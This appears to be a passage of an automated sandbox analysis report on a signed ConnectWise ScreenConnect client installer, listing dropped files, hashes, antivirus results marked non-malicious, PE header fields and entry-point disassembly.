                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):87
                                                                                                                                                                                                                                                Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                                                MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                                                SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                                                SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                                                SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                                Entropy (8bit):4.465435519119259
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:nIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSb0:IXD94+WlLZMM6YFHp+0
                                                                                                                                                                                                                                                MD5:78A4AB2C1D7042F26D69DB9AA617F2A0
                                                                                                                                                                                                                                                SHA1:69431D43A5FE74051534DAB233E514FD0EA39975
                                                                                                                                                                                                                                                SHA-256:604AD447847AEEA10F95CC3BB3000F869BF120C22E849CE6C45D969B3344BB94
                                                                                                                                                                                                                                                SHA-512:72166FAFF9BAEABFA2833148574FCD478409AAF4A1A470198D9B0D1CC67A298EB977D3B74EDC7D23527012CB9D86B41A8523A975F81EDB7597D9CBF9D66529B0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..4gT..............................................................................................................................................................................................................................................................................................................................................s$..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):6.513985351641068
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:Support.Client.exe
                                                                                                                                                                                                                                                File size:83'424 bytes
                                                                                                                                                                                                                                                MD5:35981eb47ca481b1cc8f4495da53685f
                                                                                                                                                                                                                                                SHA1:8d5601de3cfc67aca5748f50ddf9f6e63de708ce
                                                                                                                                                                                                                                                SHA256:32694b10b3f04d250b82cce2fc909dc70b074b060407b5ded5355e66f2793aa6
                                                                                                                                                                                                                                                SHA512:6b54e41246580e8eff03a6e6f5bf1e6729fc4e05195925d5903dc21e87734cb459422543b1d2ab0c5a428ea88ab38fa25b7aae14bb4ea9ff43554781014ab2a1
                                                                                                                                                                                                                                                SSDEEP:1536:ZoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYz73xDb:jenkyfPAwiMq0RqRfbaxZJYYzR
                                                                                                                                                                                                                                                TLSH:BB835B43B5D18875E9720D3118B1D9B4593FBD110EA48EAF3398826E0F351D1AE3AE7B
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                Entrypoint:0x401489
                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                                                                                Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                                                Signature Valid:true
                                                                                                                                                                                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                Error Number:0
Not Before | Not After
17/08/2022 01:00:00 | 16/08/2025 00:59:59
                                                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                call 00007FA914CCA87Ah
                                                                                                                                                                                                                                                jmp 00007FA914CCA32Fh
                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                                                                call dword ptr [0040B048h]
                                                                                                                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                call dword ptr [0040B044h]
                                                                                                                                                                                                                                                push C0000409h
                                                                                                                                                                                                                                                call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                                                call dword ptr [0040B050h]
                                                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                sub esp, 00000324h
                                                                                                                                                                                                                                                push 00000017h
                                                                                                                                                                                                                                                call dword ptr [0040B054h]
                                                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                                                je 00007FA914CCA4B7h
                                                                                                                                                                                                                                                push 00000002h
                                                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                                                int 29h
                                                                                                                                                                                                                                                mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                pushfd
                                                                                                                                                                                                                                                pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1060c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11800 | 0x2de0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xddc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
